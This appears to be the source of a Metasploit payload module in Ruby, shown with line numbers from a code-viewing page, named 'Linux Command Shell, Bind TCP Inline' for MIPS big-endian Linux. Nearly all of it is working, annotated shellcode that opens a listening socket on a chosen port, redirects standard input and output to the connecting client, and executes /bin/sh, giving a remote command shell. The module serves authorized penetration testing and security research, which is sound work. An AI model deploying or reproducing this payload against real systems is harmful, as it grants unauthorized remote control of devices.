Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 232
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Linux
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'Linux Command Shell, Bind TCP Inline',
18
      'Description'   => 'Listen for a connection and spawn a command shell',
19
      'Author'        =>
20
        [
21
          'scut',             # Original mips-irix-portshell shellcode
22
          'vaicebine',        # Original shellcode mod
23
          'Vlatko Kosturjak', # Metasploit module (mipsle)
24
          'juan vazquez'      # mipsbe conversion plus small fixes and optimizations
25
        ],
26
      'License'       => MSF_LICENSE,
27
      'Platform'      => 'linux',
28
      'Arch'          => ARCH_MIPSBE,
29
      'Handler'       => Msf::Handler::BindTcp,
30
      'Session'       => Msf::Sessions::CommandShellUnix,
31
      'Payload'       =>
32
        {
33
          'Offsets' => {} ,
34
          'Payload' => ''
35
        })
36
    )
37
  end
38

39
  def generate(_opts = {})
40
    if !datastore['LPORT']
41
      return super
42
    end
43

44
    port = Integer(datastore['LPORT'])
45
    port = [port].pack("n").unpack("cc");
46

47
    shellcode =
48
    # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
49
    "\x27\xbd\xff\xe0" + #     addiu   sp,sp,-32
50
    "\x24\x0e\xff\xfd" + #     li      t6,-3
51
    "\x01\xc0\x20\x27" + #     nor     a0,t6,zero
52
    "\x01\xc0\x28\x27" + #     nor     a1,t6,zero
53
    "\x28\x06\xff\xff" + #     slti    a2,zero,-1
54
    "\x24\x02\x10\x57" + #     li      v0,4183 ( __NR_socket )
55
    "\x01\x01\x01\x0c" + #     syscall
56

57
    # bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
58
    "\x30\x50\xff\xff" + #     andi    s0,v0,0xffff
59
    "\x24\x0e\xff\xef" + #     li      t6,-17                        ; t6: 0xffffffef
60
    "\x01\xc0\x70\x27" + #     nor     t6,t6,zero                    ; t6: 0x10 (16)
61
    "\x24\x0d\xff\xfd" + #     li      t5,-3                         ; t5: -3
62
    "\x01\xa0\x68\x27" + #     nor     t5,t5,zero                    ; t5: 0x2
63
    "\x01\xcd\x68\x04" + #     sllv    t5,t5,t6                      ; t5: 0x00020000
64
    "\x24\x0e" + port.pack("C2") +  #     li      t6,0xFFFF (port)   ; t6: 0x115c (4444 (default LPORT))
65
    "\x01\xae\x68\x25" + #     or      t5,t5,t6                      ; t5: 0x0002115c
66
    "\xaf\xad\xff\xe0" + #     sw      t5,-32(sp)
67
    "\xaf\xa0\xff\xe4" + #     sw      zero,-28(sp)
68
    "\xaf\xa0\xff\xe8" + #     sw      zero,-24(sp)
69
    "\xaf\xa0\xff\xec" + #     sw      zero,-20(sp)
70
    "\x02\x10\x20\x25" + #     or      a0,s0,s0
71
    "\x24\x0e\xff\xef" + #     li      t6,-17
72
    "\x01\xc0\x30\x27" + #     nor     a2,t6,zero
73
    "\x23\xa5\xff\xe0" + #     addi    a1,sp,-32
74
    "\x24\x02\x10\x49" + #     li      v0,4169 ( __NR_bind )A
75
    "\x01\x01\x01\x0c" + #     syscall
76

77
    # listen(3, 257) = 0
78
    "\x02\x10\x20\x25" + #     or      a0,s0,s0
79
    "\x24\x05\x01\x01" + #     li      a1,257
80
    "\x24\x02\x10\x4e" + #     li      v0,4174 ( __NR_listen )
81
    "\x01\x01\x01\x0c" + #     syscall
82

83
    # accept(3, 0, NULL) = 4
84
    "\x02\x10\x20\x25" + #     or      a0,s0,s0
85
    "\x28\x05\xff\xff" + #     slti    a1,zero,-1
86
    "\x28\x06\xff\xff" + #     slti    a2,zero,-1
87
    "\x24\x02\x10\x48" + #     li      v0,4168 ( __NR_accept )
88
    "\x01\x01\x01\x0c" + #     syscall
89

90
    # dup2(4, 2) = 2
91
    # dup2(4, 1) = 1
92
    # dup2(4, 0) = 0
93
    "\xaf\xa2\xff\xff" + #     sw v0,-1(sp) # socket
94
    "\x24\x11\xff\xfd" + #     li s1,-3
95
    "\x02\x20\x88\x27" + #     nor s1,s1,zero
96
    "\x8f\xa4\xff\xff" + #     lw a0,-1(sp)
97
    "\x02\x20\x28\x21" + #     move a1,s1 # dup2_loop
98
    "\x24\x02\x0f\xdf" + #     li v0,4063 ( __NR_dup2 )
99
    "\x01\x01\x01\x0c" + #     syscall 0x40404
100
    "\x24\x10\xff\xff" + #     li s0,-1
101
    "\x22\x31\xff\xff" + #     addi s1,s1,-1
102
    "\x16\x30\xff\xfa" + #     bne s1,s0 <dup2_loop>
103

104
    # execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
105
    "\x28\x06\xff\xff" + #     slti a2,zero,-1
106
    "\x3c\x0f\x2f\x2f" + #     lui t7,0x2f2f "//"
107
    "\x35\xef\x62\x69" + #     ori t7,t7,0x6269 "bi"
108
    "\xaf\xaf\xff\xec" + #     sw t7,-20(sp)
109
    "\x3c\x0e\x6e\x2f" + #     lui t6,0x6e2f "n/"
110
    "\x35\xce\x73\x68" + #     ori t6,t6,0x7368 "sh"
111
    "\xaf\xae\xff\xf0" + #     sw t6,-16(sp)
112
    "\xaf\xa0\xff\xf4" + #     sw zero,-12(sp)
113
    "\x27\xa4\xff\xec" + #     addiu a0,sp,-20
114
    "\xaf\xa4\xff\xf8" + #     sw a0,-8(sp)
115
    "\xaf\xa0\xff\xfc" + #     sw zero,-4(sp)
116
    "\x27\xa5\xff\xf8" + #     addiu a1,sp,-8
117
    "\x24\x02\x0f\xab" + #     li v0,4011 ( __NR_execve )
118
    "\x01\x01\x01\x0c"   #     syscall 0x40404
119

120
    return super + shellcode
121
  end
122
end
123

124